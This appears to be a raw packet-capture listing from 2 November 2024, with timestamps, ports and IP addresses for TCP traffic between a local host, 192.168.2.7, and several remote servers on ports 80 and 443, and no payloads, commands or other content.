Nov 2, 2024 17:56:55.758749008 CET	443	49970	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.758758068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.758788109 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.758826971 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.758830070 CET	49970	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.758981943 CET	49970	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.759001017 CET	443	49970	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.759010077 CET	49970	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.759016037 CET	443	49970	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.761982918 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.762017012 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.762093067 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.762280941 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.762291908 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.763366938 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.763391972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.763416052 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.763442993 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.763503075 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.763504982 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.763515949 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.763540983 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.763551950 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.768104076 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.768119097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.768178940 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.794786930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.794836998 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.794847965 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.794877052 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.794907093 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.794910908 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.794958115 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.799566031 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.799577951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.799649954 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.838542938 CET	443	49971	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.838574886 CET	443	49971	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.838618994 CET	443	49971	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.838656902 CET	49971	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.838707924 CET	49971	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.839071989 CET	49971	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.839088917 CET	443	49971	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.839101076 CET	49971	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.839107037 CET	443	49971	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.840356112 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.842617035 CET	49975	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.842639923 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.843457937 CET	49975	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.843465090 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.844413996 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.844475031 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.844480038 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.844486952 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.844516039 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.844532013 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.844538927 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.844549894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.844584942 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.844614029 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.844624043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.844659090 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.845694065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.845767021 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.845784903 CET	443	49972	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.845796108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.845808029 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.845848083 CET	443	49972	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.845853090 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.845889091 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.845911980 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.845923901 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.845947981 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.845957041 CET	49972	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.845963955 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846101999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846115112 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846127033 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846139908 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846152067 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846153021 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846184015 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846221924 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846390009 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846402884 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846415043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846434116 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846463919 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846533060 CET	49972	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.846554041 CET	443	49972	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.846565008 CET	49972	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.846571922 CET	443	49972	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.846599102 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846611023 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846621990 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846636057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846646070 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846674919 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846868992 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846885920 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846899033 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.846915960 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.846932888 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.847037077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.847048998 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.847059965 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.847083092 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.847112894 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.848617077 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.848665953 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.848741055 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.849620104 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.849639893 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.853050947 CET	49983	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.853084087 CET	443	49983	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.853168011 CET	49983	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.853329897 CET	49983	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.853344917 CET	443	49983	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.868760109 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.868818998 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.868823051 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.868869066 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.868871927 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.868885040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.868911028 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.868926048 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.868952036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.868990898 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.870014906 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.870064974 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.870070934 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.870076895 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.870115995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.870145082 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.870157957 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.870179892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.870201111 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.870234966 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.883526087 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.884083986 CET	49976	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.884118080 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.884792089 CET	49976	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.884802103 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.895082951 CET	49984	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.895123959 CET	443	49984	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.895528078 CET	49984	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.895741940 CET	49984	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.895757914 CET	443	49984	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.914082050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.914094925 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.914105892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.914273024 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.914316893 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.914328098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.914340019 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.914408922 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.960504055 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.960870028 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.960897923 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.962609053 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.962682962 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.963689089 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.963701010 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.963777065 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.963800907 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.963814974 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.963816881 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.963843107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.963876963 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.963895082 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.963901043 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.963943958 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.963943958 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.963999033 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.964026928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.964039087 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.964157104 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.964380026 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.964390039 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.964437008 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:55.964481115 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:55.964768887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.964787960 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.964826107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.964848042 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.964879036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.964895010 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.964931011 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.964973927 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965061903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965071917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965117931 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965127945 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965147018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965157986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965172052 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965213060 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965284109 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965339899 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965353966 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965404034 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965429068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965440035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965476990 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965487957 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965501070 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965522051 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965538025 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965601921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965646982 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965657949 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965745926 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965774059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965786934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965799093 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965825081 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965843916 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.965964079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965976000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965986967 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.965998888 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.966012001 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.966028929 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.966042042 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.974334955 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.974417925 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.974471092 CET	49975	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.974695921 CET	49975	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.974708080 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.974716902 CET	49975	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.974723101 CET	443	49975	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.977508068 CET	49985	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.977540970 CET	443	49985	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.977709055 CET	49985	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.977890015 CET	49985	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.977906942 CET	443	49985	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.987932920 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.987946987 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.987960100 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.988008976 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.988023043 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.988044024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.988086939 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.988095999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.988171101 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.989231110 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.989242077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.989257097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.989281893 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.989311934 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.989382982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.989394903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.989406109 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.989434958 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.989471912 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.014324903 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.014430046 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.014522076 CET	49976	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.016290903 CET	49976	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.016314030 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.016360044 CET	49976	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.016366959 CET	443	49976	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.018045902 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.033226967 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.033240080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.033308983 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.033318043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.033329964 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.033340931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.033354998 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.033365011 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.033382893 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.033411026 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.033420086 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.033458948 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.036771059 CET	49986	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.036792994 CET	443	49986	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.036871910 CET	49986	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.045201063 CET	49986	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.045213938 CET	443	49986	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.083906889 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.083928108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.083940029 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.083960056 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.083978891 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084045887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084059954 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084072113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084134102 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084176064 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084224939 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084238052 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084256887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084270000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084278107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084321022 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084522009 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084579945 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084602118 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084615946 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084651947 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084662914 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084728003 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084739923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084752083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084785938 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084816933 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084883928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084902048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084914923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084928036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084940910 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084954023 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.084964991 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.084992886 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.085156918 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085222960 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.085257053 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085294962 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085298061 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.085306883 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085362911 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.085401058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085412025 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085429907 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085441113 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.085443974 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085469007 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.085489988 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.085542917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085635900 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085647106 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.085680962 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.090873957 CET	49987	443	192.168.2.7	20.125.209.212
Nov 2, 2024 17:56:56.090918064 CET	443	49987	20.125.209.212	192.168.2.7
Nov 2, 2024 17:56:56.091036081 CET	49987	443	192.168.2.7	20.125.209.212
Nov 2, 2024 17:56:56.091190100 CET	49987	443	192.168.2.7	20.125.209.212
Nov 2, 2024 17:56:56.091206074 CET	443	49987	20.125.209.212	192.168.2.7
Nov 2, 2024 17:56:56.107036114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.107045889 CET	80	49933	62.204.41.163	192.168.2.7
